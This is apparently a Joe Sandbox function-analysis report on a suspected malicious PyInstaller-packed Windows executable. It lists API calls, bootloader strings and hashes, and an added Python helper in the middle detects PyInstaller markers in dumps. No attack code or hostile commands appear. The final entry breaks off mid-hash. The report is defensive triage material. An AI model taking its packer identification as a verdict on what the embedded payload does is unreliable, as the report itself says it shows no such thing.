                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 849930591-393685449
                                                            • Opcode ID: aa0254fa6ad752d1b0b3ebb90ffce52311fa0a6dd2bc18c7a97eb297d781420a
                                                            • Instruction ID: 23bfc0f63d1bcc1c8fd6a59d6615db3aa4b58962a5f9c92476d20113d2852f59
                                                            • Opcode Fuzzy Hash: aa0254fa6ad752d1b0b3ebb90ffce52311fa0a6dd2bc18c7a97eb297d781420a
                                                            • Instruction Fuzzy Hash: E2D1A373A0874286EB60AF69D4822ADB7A0FB66B9CF900135DF4D57799CF78E041C750
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7B10F101D), ref: 00007FF7B10F8837
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7B10F101D), ref: 00007FF7B10F888E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide
                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                            • API String ID: 626452242-27947307
                                                            • Opcode ID: da25680c1af6adbbd75f9aaa9149da67c4ccf9ada2fcee16a4d67ff34c50752a
                                                            • Instruction ID: d1e6624437fbb74f2cc2633b7e8ec7b7c058c83b99a18570ff70b1f681174541
                                                            • Opcode Fuzzy Hash: da25680c1af6adbbd75f9aaa9149da67c4ccf9ada2fcee16a4d67ff34c50752a
                                                            • Instruction Fuzzy Hash: 6C41C532A0CB4682E760EF19B48116AF7A1FB96798FA44135DB8D43B98DF7CD055C710
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(?,00007FF7B10F39CA), ref: 00007FF7B10F8D21
                                                              • Part of subcall function 00007FF7B10F29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7B10F88E2,?,?,?,?,?,?,?,?,?,?,?,00007FF7B10F101D), ref: 00007FF7B10F29F4
                                                              • Part of subcall function 00007FF7B10F29C0: MessageBoxW.USER32 ref: 00007FF7B10F2AD0
                                                            • WideCharToMultiByte.KERNEL32(?,00007FF7B10F39CA), ref: 00007FF7B10F8D95
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                            • API String ID: 3723044601-27947307
                                                            • Opcode ID: 24e20b950f9c341c4949047225b46873ae1dde5e69406ebada3fd8935fcb2f41
                                                            • Instruction ID: f76b55c3acc5a6233ab91470a820d78c410317779ce38ff5ae1c32cecc0f0340
                                                            • Opcode Fuzzy Hash: 24e20b950f9c341c4949047225b46873ae1dde5e69406ebada3fd8935fcb2f41
                                                            • Instruction Fuzzy Hash: BC219325A0DB4685EB10FB5DB8810A8F761EFA6B88FD44136CB0D43798EF7CE5118310
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                            • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                            • API String ID: 3231891352-3501660386
                                                            • Opcode ID: 95a07afb7437e9fdb1036844a629e41653b489b2c1128e3c944f638e5aaf148e
                                                            • Instruction ID: ee39ceb45709e28ad28fcfe24c499c978515abef124953dedb27ee071898fa49
                                                            • Opcode Fuzzy Hash: 95a07afb7437e9fdb1036844a629e41653b489b2c1128e3c944f638e5aaf148e
                                                            • Instruction Fuzzy Hash: 61519311E1D64741FB11B71DA9922BDE391AF677C8FC40030EB4D466DEDEACE5008761
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B10FE46A,?,?,?,00007FF7B10FD39C,?,?,?,00007FF7B10FCF91), ref: 00007FF7B10FE23D
                                                            • GetLastError.KERNEL32(?,?,?,00007FF7B10FE46A,?,?,?,00007FF7B10FD39C,?,?,?,00007FF7B10FCF91), ref: 00007FF7B10FE24B
                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B10FE46A,?,?,?,00007FF7B10FD39C,?,?,?,00007FF7B10FCF91), ref: 00007FF7B10FE275
                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF7B10FE46A,?,?,?,00007FF7B10FD39C,?,?,?,00007FF7B10FCF91), ref: 00007FF7B10FE2E3
                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF7B10FE46A,?,?,?,00007FF7B10FD39C,?,?,?,00007FF7B10FCF91), ref: 00007FF7B10FE2EF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                            • String ID: api-ms-
                                                            • API String ID: 2559590344-2084034818
                                                            • Opcode ID: 257efbe4257383a3eec37a8e0b20558c4c24ba0fcd14ee08d032d02959c7be2e
                                                            • Instruction ID: ac726ab56367649f5b1581805bb664266390cd2fe3c8e3557ff30fb7d4033ed4
                                                            • Opcode Fuzzy Hash: 257efbe4257383a3eec37a8e0b20558c4c24ba0fcd14ee08d032d02959c7be2e
                                                            • Instruction Fuzzy Hash: AA31EA25B1A70294EF51BB4AA841275A3D4BF76BA8F9A0535DF1D0775CEF7CE0408324
                                                            APIs
                                                              • Part of subcall function 00007FF7B10F8BD0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7B10F2A9B), ref: 00007FF7B10F8C0A
                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF7B10F79A1,00000000,?,00000000,00000000,?,00007FF7B10F153F), ref: 00007FF7B10F747F
                                                              • Part of subcall function 00007FF7B10F2B10: MessageBoxW.USER32 ref: 00007FF7B10F2BE5
                                                            Strings
                                                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7B10F7456
                                                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7B10F74DA
                                                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7B10F7493
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                            • API String ID: 1662231829-3498232454
                                                            • Opcode ID: 8743f48341130adb83b05e1f6ce01007e671de32885b94e340be128834149e90
                                                            • Instruction ID: 2abefd0bfeb127b0398a5a66573fee3d75a3394533be1d8339459a9add21f1f8
                                                            • Opcode Fuzzy Hash: 8743f48341130adb83b05e1f6ce01007e671de32885b94e340be128834149e90
                                                            • Instruction Fuzzy Hash: D031B711F1D68740FB20F729A9963BDD351AFBA788FC40431DB4E4279EEEACE1048621
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7B10F2A9B), ref: 00007FF7B10F8C0A
                                                              • Part of subcall function 00007FF7B10F29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7B10F88E2,?,?,?,?,?,?,?,?,?,?,?,00007FF7B10F101D), ref: 00007FF7B10F29F4
                                                              • Part of subcall function 00007FF7B10F29C0: MessageBoxW.USER32 ref: 00007FF7B10F2AD0
                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7B10F2A9B), ref: 00007FF7B10F8C90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                            • API String ID: 3723044601-876015163
                                                            • Opcode ID: 83b31a2985e644c59f7e42e272613087ded70715f2d4689f177d6a205493e17b
                                                            • Instruction ID: dcae257f020d44c82feed7881d733f89881859264deaa871f546144673fd5396
                                                            • Opcode Fuzzy Hash: 83b31a2985e644c59f7e42e272613087ded70715f2d4689f177d6a205493e17b
                                                            • Instruction Fuzzy Hash: A0219122B0DA4681EB50EB2EF441169E361FB967C8F984532DB4C83B6DEF6CD5518710
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Value$ErrorLast
                                                            • String ID:
                                                            • API String ID: 2506987500-0
                                                            • Opcode ID: ef37840ed9934c1aaeb06cf917a3ae799d9876d4d923df49702be147c9d5e414
                                                            • Instruction ID: 78ea157534c40b25d019f34921f4f0b668a7404d0ff4eac36ece72ee0b13b328
                                                            • Opcode Fuzzy Hash: ef37840ed9934c1aaeb06cf917a3ae799d9876d4d923df49702be147c9d5e414
                                                            • Instruction Fuzzy Hash: 8F217F18E0C54B82F7587329765A17CE353CF667ACFA08734EA3D466CEDEACA4008725
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                            • String ID: CONOUT$
                                                            • API String ID: 3230265001-3130406586
                                                            • Opcode ID: c684c657c71cc66e393495913d92b804321d58ad0ed46cdbde63fde403b390ba
                                                            • Instruction ID: 449e4c0a9cadb964474c7dbaea9218908cc96d60158f42a2a5981e1867ba0f25
                                                            • Opcode Fuzzy Hash: c684c657c71cc66e393495913d92b804321d58ad0ed46cdbde63fde403b390ba
                                                            • Instruction Fuzzy Hash: 3F11B421A18A49C6E350AB5AF844725F3A0FBA9FE8F444234DF1D83798CFBCD5648754
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,00007FF7B1105AAD,?,?,?,?,00007FF7B110F79F,?,?,00000000,00007FF7B110BF86,?,?,?), ref: 00007FF7B110BE77
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7B1105AAD,?,?,?,?,00007FF7B110F79F,?,?,00000000,00007FF7B110BF86,?,?,?), ref: 00007FF7B110BEAD
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7B1105AAD,?,?,?,?,00007FF7B110F79F,?,?,00000000,00007FF7B110BF86,?,?,?), ref: 00007FF7B110BEDA
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7B1105AAD,?,?,?,?,00007FF7B110F79F,?,?,00000000,00007FF7B110BF86,?,?,?), ref: 00007FF7B110BEEB
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7B1105AAD,?,?,?,?,00007FF7B110F79F,?,?,00000000,00007FF7B110BF86,?,?,?), ref: 00007FF7B110BEFC
                                                            • SetLastError.KERNEL32(?,?,?,00007FF7B1105AAD,?,?,?,?,00007FF7B110F79F,?,?,00000000,00007FF7B110BF86,?,?,?), ref: 00007FF7B110BF17
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Value$ErrorLast
                                                            • String ID:
                                                            • API String ID: 2506987500-0
                                                            • Opcode ID: ddf8d81a22343009781cfd87416a9e8d85b9fb6f44d6b4a7416555ba1d33dd0c
                                                            • Instruction ID: 7f133a7e85d11f4a774f342d3bc1cb79706803d6f770235ad044ee935651501e
                                                            • Opcode Fuzzy Hash: ddf8d81a22343009781cfd87416a9e8d85b9fb6f44d6b4a7416555ba1d33dd0c
                                                            • Instruction Fuzzy Hash: 88117114E0C64B42F7547329765A139E352CF677A8FE08734EB2E466CEDEBCA8018724
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                            • String ID: Unhandled exception in script
                                                            • API String ID: 3081866767-2699770090
                                                            • Opcode ID: 1f3d1521894b1493867d551a7722980cdb1a6c55e5d92a75b7aa063c884505e7
                                                            • Instruction ID: 68c807f15a37800ecf2e6a3cf97591f5b95212f6070f22340a7366f9710aa4e2
                                                            • Opcode Fuzzy Hash: 1f3d1521894b1493867d551a7722980cdb1a6c55e5d92a75b7aa063c884505e7
                                                            • Instruction Fuzzy Hash: 75316D72A08A8685EB20EF29F8552F9A360FF9A788F800135EB4D87B59DF7CD115C710
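The entries above recover several PyInstaller bootloader diagnostics from the main module's memory dump (PYINSTALLER_STRICT_UNPACK_MODE, the "LOADER: ... runtime-tmpdir" messages, win32_utils_to_utf8 / win32_utils_from_utf8, and the "Unhandled exception in script" dialog text). The following is an added triage helper, not code from Joe Sandbox or from the PyInstaller project: it scans a file or a dumped region for exactly those marker strings and pulls out any other "LOADER:" diagnostic it finds. The marker list is copied from the String ID fields in this report; the two-marker threshold, the regex for loader messages, and the SAMPLE / BENIGN byte blobs are this example's own assumptions and constructed inputs.

```python
"""Triage helper: does a binary or memory dump carry the PyInstaller
bootloader strings that the function analysis above recovered?
Added example; marker strings copied from the report's String ID fields."""
import re
from pathlib import Path

# Literal strings taken from the String ID fields of the entries above.
BOOTLOADER_MARKERS = (
    b"PYINSTALLER_STRICT_UNPACK_MODE",
    b"LOADER: Failed to convert runtime-tmpdir to a wide string.",
    b"LOADER: Failed to expand environment variables in the runtime-tmpdir.",
    b"LOADER: Failed to obtain the absolute path of the runtime-tmpdir.",
    b"win32_utils_to_utf8",
    b"win32_utils_from_utf8",
    b"Unhandled exception in script",
)

# Assumption: loader diagnostics are NUL-terminated printable ASCII, so any
# "LOADER: ..." message, not only the ones listed above, is surfaced.
_LOADER_MSG = re.compile(rb"LOADER: [\x20-\x7e]{8,200}")


def find_markers(data: bytes) -> dict[str, list[int]]:
    """Map each marker present in `data` to the byte offsets where it occurs."""
    found: dict[str, list[int]] = {}
    for marker in BOOTLOADER_MARKERS:
        offsets = [m.start() for m in re.finditer(re.escape(marker), data)]
        if offsets:
            found[marker.decode("ascii")] = offsets
    return found


def loader_messages(data: bytes) -> list[str]:
    """All distinct 'LOADER: ...' diagnostics, in order of first appearance."""
    seen: list[str] = []
    for m in _LOADER_MSG.finditer(data):
        text = m.group().decode("ascii")
        if text not in seen:
            seen.append(text)
    return seen


def is_pyinstaller_bootloader(data: bytes, min_markers: int = 2) -> bool:
    """Heuristic (assumed threshold): at least two independent bootloader
    strings present. A single hit is treated as too weak on its own."""
    return len(find_markers(data)) >= min_markers


def triage_file(path: str) -> dict:
    """Run the checks over an on-disk PE or a saved .sdmp region."""
    data = Path(path).read_bytes()
    return {
        "path": path,
        "pyinstaller_bootloader": is_pyinstaller_bootloader(data),
        "markers": find_markers(data),
        "loader_messages": loader_messages(data),
    }


# Constructed sample blob (not taken from the sample): a few of the report's
# strings laid out NUL-terminated, as they would sit in a read-only data section.
SAMPLE = (
    b"\x00" * 16
    + b"win32_utils_to_utf8\x00Failed to encode wchar_t as UTF-8.\x00"
    + b"PYINSTALLER_STRICT_UNPACK_MODE\x00"
    + b"LOADER: Failed to expand environment variables in the runtime-tmpdir.\x00"
    + b"LOADER: Failed to obtain the absolute path of the runtime-tmpdir.\x00"
)
# Constructed control blob with none of the markers.
BENIGN = b"MZ" + b"\x00" * 64 + b"Hello, world\x00"

if __name__ == "__main__":
    print(is_pyinstaller_bootloader(SAMPLE), find_markers(SAMPLE))
    print(loader_messages(SAMPLE))
    print(is_pyinstaller_bootloader(BENIGN))
```

Running triage_file against the main-image dump listed under Memory Dump Source (the region based on the PE at 00007FF7B10F0000) should hit the same strings this report shows; the same check works on the on-disk executable, since the bootloader is a plain native stub and these diagnostics are not obfuscated. Treat the result as a packer identification only: it says the file was built with PyInstaller, not what the embedded Python payload does.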
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7B10F88E2,?,?,?,?,?,?,?,?,?,?,?,00007FF7B10F101D), ref: 00007FF7B10F29F4
                                                              • Part of subcall function 00007FF7B10F8560: GetLastError.KERNEL32(00000000,00007FF7B10F2A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF7B10F101D), ref: 00007FF7B10F8587
                                                              • Part of subcall function 00007FF7B10F8560: FormatMessageW.KERNEL32 ref: 00007FF7B10F85B6
                                                              • Part of subcall function 00007FF7B10F8BD0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7B10F2A9B), ref: 00007FF7B10F8C0A
                                                            • MessageBoxW.USER32 ref: 00007FF7B10F2AD0
                                                            • MessageBoxA.USER32 ref: 00007FF7B10F2AEC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                            • String ID: %s%s: %s$Fatal error detected
                                                            • API String ID: 2806210788-2410924014
                                                            • Opcode ID: a22562a3e5708768cb0d15f904b55a8b62d2097d7bb286fe6f48fe5cd4d63a9f
                                                            • Instruction ID: 0cbd9a785dbfeee971ed0378cea1b640b2669c92a6a6657b742f2e2466114449
                                                            • Opcode Fuzzy Hash: a22562a3e5708768cb0d15f904b55a8b62d2097d7bb286fe6f48fe5cd4d63a9f
                                                            • Instruction Fuzzy Hash: AF31A47262868681E730EB18F4916EAE364FF95B88FC04036E78D02A9DDF7CD605CB50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 8b09857164704210b2e0253d11d0b3fe713c31e540e9fb1e205907d45fa6ef0f
                                                            • Instruction ID: 4ad81b8345129264dd89ac7a52606832465d3cfbf15abe199c565ccc946c1fb3
                                                            • Opcode Fuzzy Hash: 8b09857164704210b2e0253d11d0b3fe713c31e540e9fb1e205907d45fa6ef0f
                                                            • Instruction Fuzzy Hash: E4F04461B1960A81EB14AB29F848335E330EF9B769FD50235C76E461E8DFACD1548760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                            • Instruction ID: 392c708e0bcbf3abad28cafb7feb2014b092dccbd7f2b511dfdb7695cfd31455
